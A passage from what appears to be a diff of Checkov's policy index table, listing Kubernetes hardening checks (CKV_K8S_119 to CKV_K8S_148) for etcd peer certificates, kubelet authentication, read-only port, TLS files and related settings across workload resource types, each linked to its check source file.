Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3409 | CKV_K8S_119 
| resource | Deployment | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3410 | CKV_K8S_119 | resource | DeploymentConfig | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3411 | CKV_K8S_119 | resource | Job | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3412 | CKV_K8S_119 | resource | Pod | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3413 | CKV_K8S_119 | resource | PodTemplate | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3414 | CKV_K8S_119 | resource | ReplicaSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3415 | CKV_K8S_119 | resource | ReplicationController | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3416 | CKV_K8S_119 | resource | StatefulSet | Ensure that the 
--peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3417 | CKV_K8S_121 | resource | Pod | Ensure that the --peer-client-cert-auth argument is set to true | Kubernetes | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py) | +| 3418 | CKV_K8S_138 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3419 | CKV_K8S_138 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3420 | CKV_K8S_138 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3421 | CKV_K8S_138 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3422 | CKV_K8S_138 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3423 | CKV_K8S_138 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | 
[KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3424 | CKV_K8S_138 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3425 | CKV_K8S_138 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3426 | CKV_K8S_138 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3427 | CKV_K8S_138 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | +| 3428 | CKV_K8S_139 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3429 | CKV_K8S_139 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3430 | CKV_K8S_139 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3431 | CKV_K8S_139 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3432 | CKV_K8S_139 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3433 | CKV_K8S_139 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3434 | CKV_K8S_139 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3435 | CKV_K8S_139 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3436 | CKV_K8S_139 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3437 | CKV_K8S_139 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | +| 3438 | CKV_K8S_140 | resource | CronJob | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3439 | CKV_K8S_140 | resource | DaemonSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3440 | CKV_K8S_140 | resource | Deployment | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3441 | CKV_K8S_140 | resource | DeploymentConfig | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3442 | CKV_K8S_140 | resource | Job | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3443 | CKV_K8S_140 | resource | Pod | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | 
[KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3444 | CKV_K8S_140 | resource | PodTemplate | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3445 | CKV_K8S_140 | resource | ReplicaSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3446 | CKV_K8S_140 | resource | ReplicationController | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3447 | CKV_K8S_140 | resource | StatefulSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | +| 3448 | CKV_K8S_141 | resource | CronJob | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3449 | CKV_K8S_141 | resource | DaemonSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3450 | CKV_K8S_141 | resource | Deployment | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3451 | CKV_K8S_141 | resource | DeploymentConfig 
| Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3452 | CKV_K8S_141 | resource | Job | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3453 | CKV_K8S_141 | resource | Pod | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3454 | CKV_K8S_141 | resource | PodTemplate | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3455 | CKV_K8S_141 | resource | ReplicaSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3456 | CKV_K8S_141 | resource | ReplicationController | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3457 | CKV_K8S_141 | resource | StatefulSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | +| 3458 | CKV_K8S_143 | resource | CronJob | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | 
[KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3459 | CKV_K8S_143 | resource | DaemonSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3460 | CKV_K8S_143 | resource | Deployment | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3461 | CKV_K8S_143 | resource | DeploymentConfig | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3462 | CKV_K8S_143 | resource | Job | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3463 | CKV_K8S_143 | resource | Pod | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3464 | CKV_K8S_143 | resource | PodTemplate | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | 
[KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3465 | CKV_K8S_143 | resource | ReplicaSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3466 | CKV_K8S_143 | resource | ReplicationController | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3467 | CKV_K8S_143 | resource | StatefulSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3468 | CKV_K8S_144 | resource | CronJob | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3469 | CKV_K8S_144 | resource | DaemonSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3470 | CKV_K8S_144 | resource | Deployment | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 
3471 | CKV_K8S_144 | resource | DeploymentConfig | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3472 | CKV_K8S_144 | resource | Job | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3473 | CKV_K8S_144 | resource | Pod | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3474 | CKV_K8S_144 | resource | PodTemplate | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3475 | CKV_K8S_144 | resource | ReplicaSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3476 | CKV_K8S_144 | resource | ReplicationController | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3477 | CKV_K8S_144 | resource | StatefulSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | 
[KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3478 | CKV_K8S_145 | resource | CronJob | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3479 | CKV_K8S_145 | resource | DaemonSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3480 | CKV_K8S_145 | resource | Deployment | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3481 | CKV_K8S_145 | resource | DeploymentConfig | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3482 | CKV_K8S_145 | resource | Job | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3483 | CKV_K8S_145 | resource | Pod | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3484 | CKV_K8S_145 | resource | PodTemplate | Ensure that the --make-iptables-util-chains argument is 
set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3485 | CKV_K8S_145 | resource | ReplicaSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3486 | CKV_K8S_145 | resource | ReplicationController | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3487 | CKV_K8S_145 | resource | StatefulSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3488 | CKV_K8S_146 | resource | CronJob | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3489 | CKV_K8S_146 | resource | DaemonSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3490 | CKV_K8S_146 | resource | Deployment | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3491 | CKV_K8S_146 | resource | DeploymentConfig | Ensure that the --hostname-override argument is not set | Kubernetes | 
[KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3492 | CKV_K8S_146 | resource | Job | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3493 | CKV_K8S_146 | resource | Pod | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3494 | CKV_K8S_146 | resource | PodTemplate | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3495 | CKV_K8S_146 | resource | ReplicaSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3496 | CKV_K8S_146 | resource | ReplicationController | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3497 | CKV_K8S_146 | resource | StatefulSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3498 | CKV_K8S_147 | resource | CronJob | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | 
[KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3499 | CKV_K8S_147 | resource | DaemonSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3500 | CKV_K8S_147 | resource | Deployment | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3501 | CKV_K8S_147 | resource | DeploymentConfig | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3502 | CKV_K8S_147 | resource | Job | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3503 | CKV_K8S_147 | resource | Pod | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3504 | CKV_K8S_147 | resource | PodTemplate | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3505 | CKV_K8S_147 | resource | ReplicaSet | Ensure that the 
--event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3506 | CKV_K8S_147 | resource | ReplicationController | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3507 | CKV_K8S_147 | resource | StatefulSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3508 | CKV_K8S_148 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3509 | CKV_K8S_148 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3510 | CKV_K8S_148 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3511 | CKV_K8S_148 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3512 | CKV_K8S_148 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3513 | CKV_K8S_148 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3514 | CKV_K8S_148 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3515 | CKV_K8S_148 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3516 | CKV_K8S_148 | resource | ReplicationController | Ensure that the --tls-cert-file and 